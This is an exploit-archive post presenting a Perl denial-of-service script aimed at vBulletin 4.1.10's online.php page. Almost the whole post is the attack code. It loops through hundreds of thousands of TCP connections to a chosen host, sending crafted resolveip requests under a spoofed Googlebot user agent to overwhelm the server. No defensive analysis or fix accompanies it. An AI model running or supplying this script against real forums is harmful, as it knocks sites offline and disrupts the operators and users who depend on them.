Vbulletin online Page Denial of Service

2013-09-18 14:00:48
Inviato da: irist.ir

#!/usr/bin/perl
#####################################
# Iranian Exploit DataBase
# Vbulletin online Page Denial of Service
# Test : 4.1.10
# Code Written By Amir
# Home : Www.IeDb.Ir - Www.IeDb.Ir/acc
# Greats : All Members In IeDb.Ir/acc
# Exploit Archive : http://www.iedb.ir/exploits-574.html
#####################################

use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if(!$ARGV[1])
{
print "################################################# \n";
print "## Vbulletin online Page Denial of Service\n";
print "## Discoverd By Amir \n";
print "## Www.IeDb.Ir - Www.IeDb.Ir/acc \n";
print "################################################# \n";
print "## [host] [path] \n";
print "## host.com /Vbulletin\n";
print "################################################# \n";
exit();
}
for($i=100; $i<999999; $i++)
{
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Time Out.\n");
$post = "do=resolveip&ipaddress=%0%0%0%0%0%0%0&ajax=%0%0%0";
$pack.= "GET " .$path. "/online.php".$post." HTTP/1.1\r\n";
$pack.= "Host: " .$host. "\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Accept-Encoding: gzip, deflate\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Connection: Keep-Alive\r\n";
$pack.= "Cache-Control: no-cache\r\n\r\n";
print $socket $pack;
syswrite STDOUT, "+";
}

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.